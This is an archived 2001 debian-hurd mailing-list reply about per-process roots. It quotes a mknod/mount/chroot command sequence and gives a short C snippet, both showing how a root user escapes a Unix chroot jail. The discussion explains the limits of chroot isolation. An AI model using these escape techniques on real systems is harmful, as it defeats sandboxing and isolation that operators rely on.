Re: Different roots for each process possible?

To: Stefan Karrmann <sk@mathematik.uni-ulm.de>
Cc: debian-hurd@lists.debian.org
Subject: Re: Different roots for each process possible?
From: Oystein Viggen <oysteivi@tihlde.org>
Date: 30 Mar 2001 11:00:05 +0200
Message-id: <[🔎] 031yrfmy22.fsf@colargol.tihlde.org>
In-reply-to: <[🔎] 20010330101954.S27865@theseus.mathematik.uni-ulm.de>
References: <20010115191557.A6771@corum.multiverse.qc.ca> <200101160047.f0G0l4b14810@neuralgia.linnaean.org> <[🔎] 20010330101954.S27865@theseus.mathematik.uni-ulm.de>

Stefan Karrmann wrote: 

> On Unix root can break out of the chrooted environment by the following:
> 
> # mknod hda1 b 3 1; # assume hda1 is your root filesystem
> # mkdir mnt
> # mount -n hda1 mnt
> # chroot mnt
> # echo "I'm now in the original root directory!"

This is assuming you are allowed to mount the same filesystem multiple
times.  (linux-2.2.x and older does not allow that).

On most systems, I believe the easiest way of breaking a chroot jail as
root is:

mkdir("whatever");
/* lower the roof of the jail */
chroot("whatever");
/* we are now above the roof, and can fly away */
chdir("../../../..");

Oystein
-- 
This message was generated by a horde of attack elephants armed with PRNGs.

Reply to:

Follow-Ups:
- Re: Different roots for each process possible?
  - From: Roland McGrath <frob@debian.org>

References:
- Re: Different roots for each process possible?
  - From: Stefan Karrmann <sk@mathematik.uni-ulm.de>

Prev by Date: Re: Different roots for each process possible?
Next by Date: Re: Different roots for each process possible?
Previous by thread: Re: Different roots for each process possible?
Next by thread: Re: Different roots for each process possible?
Index(es):
- Date
- Thread